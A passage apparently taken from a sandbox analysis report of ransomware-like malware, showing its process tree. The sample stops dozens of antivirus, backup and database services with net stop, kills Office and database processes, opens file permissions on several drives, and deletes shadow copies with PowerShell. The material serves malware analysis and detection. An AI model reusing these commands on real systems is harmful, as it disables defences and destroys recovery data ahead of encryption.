PID:14232

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
2⤵
PID:6716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
3⤵
PID:14940

C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
2⤵
PID:6708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
3⤵
PID:14812

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
2⤵
PID:6700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
3⤵
PID:12304

C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
2⤵
PID:6692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
3⤵
PID:14348

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
2⤵
PID:6684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
3⤵
PID:14460

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
2⤵
PID:6676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
3⤵
PID:13816

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:6664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:13808

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
2⤵
PID:6648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
3⤵
PID:14008

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
2⤵
PID:6640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
3⤵
PID:2348

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
2⤵
PID:6632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
3⤵
PID:14208

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
2⤵
PID:6624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
3⤵
PID:14176

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
2⤵
PID:6616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
3⤵
PID:12360

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
2⤵
PID:6600

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
3⤵
PID:13428

C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
2⤵
PID:6592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
3⤵
PID:528

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
2⤵
PID:6584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
3⤵
PID:14388

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
2⤵
PID:6576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
3⤵
PID:13840

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
2⤵
PID:6560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
3⤵
PID:14064

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
2⤵
PID:6552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
3⤵
PID:14516

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
2⤵
PID:6544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
3⤵
PID:14104

C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
2⤵
PID:6536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
3⤵
PID:13888

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
2⤵
PID:6520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
3⤵
PID:13928

C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
2⤵
PID:6512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
3⤵
PID:13348

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
2⤵
PID:6504

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
3⤵
PID:13992

C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
2⤵
PID:6496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
3⤵
PID:14248

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
2⤵
PID:6488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
3⤵
PID:11476

C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
2⤵
PID:6480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
3⤵
PID:14884

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
2⤵
PID:6464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
3⤵
PID:14088

C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
2⤵
PID:6456

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
3⤵
PID:13912

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
2⤵
PID:6448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
3⤵
PID:14320

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
2⤵
PID:6440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
3⤵
PID:14868

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
2⤵
PID:6428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
3⤵
PID:14844

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
2⤵
PID:6412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
3⤵
PID:14240

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
2⤵
PID:6404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
3⤵
PID:4008

C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
2⤵
PID:6396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
3⤵
PID:14312

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
2⤵
PID:6388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
3⤵
PID:10924

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
2⤵
PID:6380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
3⤵
PID:3288

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
2⤵
PID:6364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
3⤵
PID:6304

C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
2⤵
PID:6356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
3⤵
PID:3568

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
2⤵
PID:6348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
3⤵
PID:14900

C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
2⤵
PID:6340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
3⤵
PID:14072

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
2⤵
PID:6324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
3⤵
PID:1532

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
2⤵
PID:6316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
3⤵
PID:3176

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:6308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
3⤵
PID:3256

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
2⤵
PID:6288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
3⤵
PID:14184

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
2⤵
PID:6280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
3⤵
PID:14500

C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
2⤵
PID:6272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
3⤵
PID:4444

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:6264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:14908

C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
2⤵
PID:6256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
3⤵
PID:13316

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
2⤵
PID:6240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
3⤵
PID:14168

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
2⤵
PID:6232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
3⤵
PID:1384

C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
2⤵
PID:6224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
3⤵
PID:4692

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
2⤵
PID:6216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
3⤵
PID:2628

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:6200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
3⤵
PID:13920

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
2⤵
PID:6192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:4200

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
2⤵
PID:6184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
3⤵
PID:14256

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
2⤵
PID:6176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
3⤵
PID:13880

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
2⤵
PID:6168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
3⤵
PID:14796

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
2⤵
PID:6160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
3⤵
PID:14200

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
2⤵
PID:6152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
3⤵
PID:13864

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
2⤵
PID:6136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
3⤵
PID:13784

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
2⤵
PID:6128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
3⤵
PID:3144

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
2⤵
PID:6120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
3⤵
PID:14380

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
2⤵
PID:6112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
3⤵
PID:14356

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
2⤵
PID:6096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
3⤵
PID:13760

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
2⤵
PID:6088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
3⤵
PID:14152

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
2⤵
PID:6080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
3⤵
PID:14304

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
2⤵
PID:6072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
3⤵
PID:4128

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:6064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
3⤵
PID:14476

C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
2⤵
PID:6056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
3⤵
PID:14160

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
2⤵
PID:6040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
3⤵
PID:14396

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
2⤵
PID:6032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
3⤵
PID:14040

C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
2⤵
PID:6024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
3⤵
PID:13896

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
2⤵
PID:6016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
3⤵
PID:13412

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
2⤵
PID:6000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
3⤵
PID:13944

C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
2⤵
PID:5992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
3⤵
PID:14288

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
2⤵
PID:5984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:14328

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
2⤵
PID:5976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
3⤵
PID:4328

C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
2⤵
PID:5968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
3⤵
PID:13420

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
2⤵
PID:5952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:6532

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
2⤵
PID:5944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
3⤵
PID:14080

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
2⤵
PID:5936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
3⤵
PID:13976

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
2⤵
PID:5920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:13936

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
2⤵
PID:5912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
3⤵
PID:13776

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
2⤵
PID:5904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
3⤵
PID:14924

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
2⤵
PID:5896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:3584

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:5888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:14096

C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
2⤵
PID:5872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
3⤵
PID:3524

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
2⤵
PID:5864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
3⤵
PID:14828

C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
2⤵
PID:5856

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
3⤵
PID:3264

C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
2⤵
PID:5848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
3⤵
PID:14216

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
2⤵
PID:5828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
3⤵
PID:13488

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:5820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3⤵
PID:13444

C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
2⤵
PID:5812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
3⤵
PID:14364

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
2⤵
PID:5804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
3⤵
PID:14136

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
2⤵
PID:5796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
3⤵
PID:13500

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:5788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
3⤵
PID:14264

C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
2⤵
PID:5780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
3⤵
PID:14112

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
2⤵
PID:5772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
3⤵
PID:14820

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:5764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
3⤵
PID:12368

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:5756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
3⤵
PID:14484

C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
2⤵
PID:9848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
3⤵
PID:13856

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:8272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
3⤵
PID:14860

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:8264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3⤵
PID:14340

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:8256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:14452

C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
2⤵
PID:8248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
3⤵
PID:14024

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:8240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
3⤵
PID:14224

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:7888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
3⤵
PID:14016

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11244

C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:13028

C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:13020

C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:13012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:13000

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12992

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8176

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7292

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9316

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8316

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11260

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11252

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11236

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11228

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11220

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11212

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11204

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11196

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11188

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11180

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11172

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11164

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11156

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11148

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11140

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11132

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11124

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11116

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11108

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11100

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:11092

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11084

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11076

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11068

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11060

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11052

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11044

